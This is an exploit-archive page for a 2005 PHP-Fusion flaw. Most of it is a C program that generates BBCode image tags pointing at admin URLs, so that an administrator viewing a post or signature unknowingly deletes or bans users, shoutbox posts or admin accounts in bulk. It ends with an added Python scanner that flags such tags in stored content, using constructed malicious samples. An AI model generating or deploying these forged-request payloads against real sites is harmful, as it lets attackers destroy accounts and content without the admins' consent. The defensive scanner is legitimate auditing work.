PHP-Fusion 6.0.106 – BBCode IMG Tag Script Injection
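Vulnerability ID | 1055323 | Vulnerability type | |
Published | 2005-08-05 | Updated | 2005-08-05 |
CVE ID | N/A |
CNNVD-ID | N/A |
Platform | PHP | CVSS score | N/A |
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit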
/*
ahh I was hoping for some socket code :( /str0ke
Dark Assassins - http://dark-assassins.com/
Visit us on IRC @ irc.tddirc.net #DarkAssassins
PHP-Fusion [img][/img] exploit
Discovered/Coded by Easyex
Using the [img] [/img] codes we can get an administrator to do a function a normal member cannot do.
For example..
[img]/administration/members.php?step=delete&sortby=all&rowstart=0&user_id=1[/img]
This could be in our signature, forum post or in a comment post. When an admin views the page with the malicious code it will automatically load and do the function we selected. In the example it would delete the shout box post with the id 1.
Because we are using the [img] [/img] code it just shows up as an invalid image.
Code usage:
./fusionimg <version> <dir> deluser <start> <end>
./fusionimg <version> <dir> banuser <start> <end>
./fusionimg <version> <dir> delshout <start> <end>
./fusionimg <version> <dir> deladmin <start> <end>
<version> is the PHP-Fusion version. enter 6.x or 5.x depending on the version number.
<start> is the start point of user id(s)
<end> is the end point of the user id(s)
So if we had a vulnerable host running PHP Fusion v6.00.106 or below with say 150 users and we wanted to delete them all we would type ./fusionimg 6.x / deluser 1 150 or if we wanted to delete 1 user that had the id: 5 we would type: ./fusionimg 6.x / deluser 5 5
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int usage() {
    printf("Usage: ./fusionimg <version> <dir> <option> <start> <end>\n");
    printf("Example: ./fusionimg 6.x / deluser 1 500\n");
    exit(1);
}

int main (int argc, char *argv[]) {
    printf("\n");
    printf("PHP-Fusion [img][/img] exploit\n");
    printf("Coded by Easyex from the Dark Assassins crew\n\n");
    if(argc < 6 )
        usage();
    int i;
    char cmd[512];
    char option[512];
    char version[512];
    FILE *log;
    log = fopen("exploit.txt", "w+");
    if(log == 0) {
        printf("[-] Error opening log file.\n");
        exit(-1);
    }
    fprintf(log, "PHP-Fusion [img][/img] exploit\n");
    fprintf(log, "Discovered/Coded by Easyex\n\n");
    if(strcmp(argv[1], "6.x") == 0) {
        strncpy(version, "administration/", 512);
    }
    else if(strcmp(argv[1], "5.x") == 0) {
        strncpy(version, "fusion_admin/", 512);
    }
    else {
        printf("[-] Error, Invalid version!\n");
        exit(-1);
    }
    // There are other options you can do, This is just some of them...
    // If you need to find out a users id you can just go to members.php and click on the user you want and the id will show in the url like ?lookup=1
    if(strcmp(argv[3], "deluser") == 0) {
        strncpy(option, "members.php?step=delete&sortby=all&rowstart=0&user_id=", 512);
        fprintf(log, "You have selected to delete %s > %s user(s)\n", argv[4], argv[5]);
    }
    else if(strcmp(argv[3], "banuser") == 0) {
        strncpy(option, "members.php?step=ban&act=on&sortby=all&rowstart=0&user_id=", 512);
        fprintf(log, "You have selected to ban %s > %s user(s)\n", argv[4], argv[5]);
    }
    else if(strcmp(argv[3], "delshout") == 0) {
        strncpy(option, "shoutbox.php?action=delete&shout_id=", 512);
        fprintf(log, "You have selected to delete %s > %s shoutbox post(s)\n", argv[4], argv[5]);
    }
    // We can delete any account, But we cant add admin accounts
    else if(strcmp(argv[3], "deladmin") == 0) {
        strncpy(option, "administrators.php?remove=", 512);
        fprintf(log, "You have selected to delete %s > %s administator(s)\n", argv[4], argv[5]);
    }
    else {
        printf("[-] Error, Invalid option!\n");
        exit(-1);
    }
    printf("[+] Generating image codes...\n\n");
    fprintf(log, "Add the following lines of code into your signature, forum post or in a comment post:\n\n");
    for (i = atoi(argv[4]); i <= atoi(argv[5]); i++) {
        // Bounded write: <dir> comes from the command line and cmd is 512 bytes
        snprintf(cmd, sizeof(cmd), "[img]%s%s%s%d[/img]", argv[2], version, option, i);
        fprintf(log, "%s\n", cmd);
    }
    printf("[+] Completed & logged to exploit.txt\n");
    exit(1);
}
// milw0rm.com [2005-08-05]
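
For site operators auditing stored content, the following added example (not part of the original advisory or of PHP-Fusion) scans signatures, posts and comments for `[img]` tags of the kind described above: URLs that point into the admin directories named on this page, carry a query string, or do not end in an image extension. The row layout, the function names and the extension list are assumptions made for illustration, and the sample rows are constructed.

```python
import re
from urllib.parse import urlsplit, unquote

# Admin directories named on this page for 6.x and 5.x.
ADMIN_DIRS = ("administration/", "fusion_admin/")
# Assumed allow-list of image extensions; adjust to local policy.
IMAGE_EXTS = (".png", ".jpg", ".jpeg", ".gif")
IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)


def classify_img_url(raw):
    """Return the reasons a URL is suspicious; an empty list means it looks like an image."""
    # Decode percent-escapes first so an encoded admin path or '?' is still seen.
    parts = urlsplit(unquote(raw.strip()))
    path = parts.path.lower()
    reasons = []
    if any(d in path for d in ADMIN_DIRS):
        reasons.append("admin-path")
    if parts.query:
        reasons.append("query-string")
    if not path.endswith(IMAGE_EXTS):
        reasons.append("not-image-extension")
    return reasons


def scan_content(rows):
    """rows: iterable of (source, author, text). Returns one finding per flagged tag."""
    findings = []
    for source, author, text in rows:
        for match in IMG_TAG.finditer(text):
            url = match.group(1).strip()
            reasons = classify_img_url(url)
            if reasons:
                findings.append((source, author, url, reasons))
    return findings


# Constructed sample rows (not real data); the first flagged URL is the one quoted on this page.
SAMPLE = [
    ("forum_post:12", "alice", "Look: [img]http://example.org/pics/cat.png[/img]"),
    ("signature:7", "mallory",
     "[IMG]/administration/members.php?step=delete&sortby=all&rowstart=0&user_id=1[/IMG]"),
    ("comment:3", "mallory", "[img] /fusion_admin/shoutbox.php?action=delete&shout_id=4 [/img]"),
    ("comment:9", "bob", "[img]/images/%61dministration/x.php[/img]"),
]

if __name__ == "__main__":
    for finding in scan_content(SAMPLE):
        print(finding)
```

The checks are heuristics for reviewing existing content; a flagged tag shows which account posted it and where an administrator would have loaded it.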